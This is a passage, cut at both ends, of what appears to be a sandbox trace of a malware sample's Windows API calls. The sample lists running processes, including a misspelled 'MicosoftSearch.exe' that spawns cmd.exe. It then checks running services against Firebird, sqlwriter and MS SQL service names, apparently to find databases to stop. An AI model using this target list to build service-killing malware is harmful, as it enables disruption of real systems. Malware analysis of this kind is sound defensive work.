szExeFile="audiodg.exe")) returned 1 [0032.177] lstrlenW (lpString="audiodg.exe") returned 11 [0032.177] Process32NextW (in: hSnapshot=0x110, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0032.178] lstrlenW (lpString="svchost.exe") returned 11 [0032.178] Process32NextW (in: hSnapshot=0x110, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0032.178] lstrlenW (lpString="svchost.exe") returned 11 [0032.178] Process32NextW (in: hSnapshot=0x110, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0032.179] lstrlenW (lpString="dwm.exe") returned 7 [0032.179] Process32NextW (in: hSnapshot=0x110, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0032.179] lstrlenW (lpString="explorer.exe") returned 12 [0032.180] Process32NextW (in: hSnapshot=0x110, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0032.180] lstrlenW (lpString="spoolsv.exe") returned 11 [0032.180] Process32NextW (in: hSnapshot=0x110, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0032.181] lstrlenW (lpString="taskhost.exe") returned 12 [0032.181] Process32NextW (in: hSnapshot=0x110, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0032.181] lstrlenW (lpString="svchost.exe") returned 11 [0032.181] Process32NextW (in: hSnapshot=0x110, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0032.182] lstrlenW (lpString="taskeng.exe") returned 11 [0032.182] Process32NextW (in: hSnapshot=0x110, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0032.182] lstrlenW (lpString="taskhost.exe") returned 12 [0032.182] Process32NextW (in: hSnapshot=0x110, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x588, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ingredients posters keywords.exe")) returned 1 [0032.183] lstrlenW (lpString="ingredients posters keywords.exe") returned 32 [0032.183] Process32NextW (in: hSnapshot=0x110, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="moderate-instruments-repairs.exe")) returned 1 [0032.184] lstrlenW (lpString="moderate-instruments-repairs.exe") returned 32 [0032.184] Process32NextW (in: hSnapshot=0x110, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sa_shape.exe")) returned 1 [0032.184] lstrlenW (lpString="sa_shape.exe") returned 12 [0032.184] Process32NextW (in: hSnapshot=0x110, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x788, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="confidence.exe")) returned 1 [0032.186] lstrlenW (lpString="confidence.exe") returned 14 [0032.186] Process32NextW (in: hSnapshot=0x110, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="jaguar_assist_dictionaries.exe")) returned 1 [0032.186] lstrlenW (lpString="jaguar_assist_dictionaries.exe") returned 30 [0032.186] Process32NextW (in: hSnapshot=0x110, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="blue.exe")) returned 1 [0032.187] lstrlenW (lpString="blue.exe") returned 8 [0032.187] Process32NextW (in: hSnapshot=0x110, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="newly debut.exe")) returned 1 [0032.188] lstrlenW (lpString="newly debut.exe") returned 15 [0032.188] Process32NextW (in: hSnapshot=0x110, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="symbols_garage_parents.exe")) returned 1 [0032.188] lstrlenW (lpString="symbols_garage_parents.exe") returned 26 [0032.188] Process32NextW (in: hSnapshot=0x110, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="archive.exe")) returned 1 [0032.189] lstrlenW (lpString="archive.exe") returned 11 [0032.189] Process32NextW (in: hSnapshot=0x110, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="defend.exe")) returned 1 [0032.189] lstrlenW (lpString="defend.exe") returned 10 [0032.189] Process32NextW (in: hSnapshot=0x110, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="arservice.exe")) returned 1 [0032.190] lstrlenW (lpString="arservice.exe") returned 13 [0032.190] Process32NextW (in: hSnapshot=0x110, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x15c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr-programmer.exe")) returned 1 [0032.190] lstrlenW (lpString="rr-programmer.exe") returned 17 [0032.191] Process32NextW (in: hSnapshot=0x110, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="capability-ethernet-museums.exe")) returned 1 [0032.191] lstrlenW (lpString="capability-ethernet-museums.exe") returned 31 [0032.191] Process32NextW (in: hSnapshot=0x110, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="twistedmonton.exe")) returned 1 [0032.192] lstrlenW (lpString="twistedmonton.exe") returned 17 [0032.192] Process32NextW (in: hSnapshot=0x110, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="arc plains.exe")) returned 1 [0032.886] lstrlenW (lpString="arc plains.exe") returned 14 [0032.886] Process32NextW (in: hSnapshot=0x110, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="americahousestip.exe")) returned 1 [0032.886] lstrlenW (lpString="americahousestip.exe") returned 20 [0032.886] Process32NextW (in: hSnapshot=0x110, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="cats-exceed-photo.exe")) returned 1 [0032.887] lstrlenW (lpString="cats-exceed-photo.exe") returned 21 [0032.887] Process32NextW (in: hSnapshot=0x110, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="medical lectures.exe")) returned 1 [0032.888] lstrlenW (lpString="medical lectures.exe") returned 20 [0032.888] Process32NextW (in: hSnapshot=0x110, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="electronic.exe")) returned 1 [0032.888] lstrlenW (lpString="electronic.exe") returned 14 [0032.888] Process32NextW (in: hSnapshot=0x110, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="regression.exe")) returned 1 [0032.889] lstrlenW (lpString="regression.exe") returned 14 [0032.889] Process32NextW (in: hSnapshot=0x110, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="county.exe")) returned 1 [0032.889] lstrlenW (lpString="county.exe") returned 10 [0032.889] Process32NextW (in: hSnapshot=0x110, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0032.890] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0032.890] Process32NextW (in: hSnapshot=0x110, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x910, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0032.891] lstrlenW (lpString="dllhost.exe") returned 11 [0032.891] Process32NextW (in: hSnapshot=0x110, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x934, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0032.907] lstrlenW (lpString="dllhost.exe") returned 11 [0032.907] Process32NextW (in: hSnapshot=0x110, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="MicosoftSearch.exe")) returned 1 [0032.908] lstrlenW (lpString="MicosoftSearch.exe") returned 18 [0032.908] Process32NextW (in: hSnapshot=0x110, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x968, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x954, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0032.908] lstrlenW (lpString="cmd.exe") returned 7 [0032.908] Process32NextW (in: hSnapshot=0x110, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x968, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x954, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 0 [0032.909] CloseHandle (hObject=0x110) returned 1 [0032.909] Sleep (dwMilliseconds=0x1f4) [0034.478] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0xb902c0 [0034.479] EnumServicesStatusExW (in: hSCManager=0xb902c0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x282ff44, lpServicesReturned=0x282ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x282ff44, lpServicesReturned=0x282ff5c, lpResumeHandle=0x0) returned 0 [0034.479] GetLastError () returned 0xea [0034.480] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x11e4) returned 0x2ec0090 [0034.480] EnumServicesStatusExW (in: hSCManager=0xb902c0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x2ec0090, cbBufSize=0x11e4, pcbBytesNeeded=0x282ff44, lpServicesReturned=0x282ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x2ec0090, pcbBytesNeeded=0x282ff44, lpServicesReturned=0x282ff5c, lpResumeHandle=0x0) returned 1 [0034.480] CloseServiceHandle (hSCObject=0xb902c0) returned 1 [0034.481] lstrlenW (lpString="Appinfo") returned 7 [0034.481] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0034.481] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0034.481] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0034.481] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0034.481] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0034.481] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0034.481] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0034.481] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0034.481] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0034.481] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0034.481] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0034.481] lstrlenW (lpString="AudioSrv") returned 8 [0034.481] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0034.481] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0034.481] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0034.481] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0034.481] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0034.481] lstrlenW (lpString="BFE") returned 3 [0034.481] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0034.481] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0034.481] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0034.481] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0034.481] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0034.481] lstrlenW (lpString="CryptSvc") returned 8 [0034.481] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0034.481] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0034.481] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0034.481] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0034.482] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0034.482] lstrlenW (lpString="CscService") returned 10 [0034.482] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0034.482] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0034.482] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0034.482] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0034.482] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0034.482] lstrlenW (lpString="DcomLaunch") returned 10 [0034.482] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0034.482] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0034.482] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0034.482] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0034.482] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0034.482] lstrlenW (lpString="Dhcp") returned 4 [0034.482] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0034.482] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0034.482] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0034.482] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0034.482] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0034.482] lstrlenW (lpString="Dnscache") returned 8 [0034.482] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0034.482] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0034.482] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0034.482] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0034.482] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0034.482] lstrlenW (lpString="DPS") returned 3 [0034.482] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0034.482] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0034.482] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0034.482] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0034.482] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0034.482] lstrlenW (lpString="eventlog") returned 8 [0034.482] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0034.483] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0034.483] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0034.483] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0034.483] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0034.483] lstrlenW (lpString="EventSystem") returned 11 [0034.483] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0034.483] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0034.483] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0034.483] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0034.483] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0034.483] lstrlenW (lpString="gpsvc") returned 5 [0034.483] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0034.483] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0034.483] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0034.483] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0034.483] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0034.483] lstrlenW (lpString="iphlpsvc") returned 8 [0034.483] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0034.483] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0034.483] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0034.483] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0034.483] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0034.483] lstrlenW (lpString="LanmanServer") returned 12 [0034.483] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0034.483] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0034.483] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0034.483] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0034.483] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0034.483] lstrlenW (lpString="LanmanWorkstation") returned 17 [0034.483] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0034.483] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0034.483] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0034.483] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0034.484] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0034.484] lstrlenW (lpString="lmhosts") returned 7 [0034.484] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0034.484] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0034.484] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0034.484] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0034.484] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0034.484] lstrlenW (lpString="MMCSS") returned 5 [0034.484] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0034.484] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0034.484] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0034.484] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0034.484] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0034.484] lstrlenW (lpString="MpsSvc") returned 6 [0034.484] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0034.484] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0034.484] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0034.484] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0034.484] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0034.484] lstrlenW (lpString="Netman") returned 6 [0034.484] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1 [0034.484] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1 [0034.484] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1 [0034.484] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1 [0034.484] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1 [0034.484] lstrlenW (lpString="netprofm") returned 8 [0034.484] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0034.484] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0034.484] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0034.484] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0034.484] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0034.484] lstrlenW (lpString="NlaSvc") returned 6 [0034.484] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0034.485] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0034.485] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0034.485] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0034.485] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0034.485] lstrlenW (lpString="nsi") returned 3 [0034.485] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0034.485] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0034.485] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0034.485] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0034.485] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0034.485] lstrlenW (lpString="PcaSvc") returned 6 [0034.485] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0034.485] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0034.485] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0034.485] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0034.485] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0034.485] lstrlenW (lpString="PlugPlay") returned 8 [0034.485] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0034.485] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0034.485] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0034.485] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0034.485] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0034.485] lstrlenW (lpString="Power") returned 5 [0034.485] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0034.485] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") 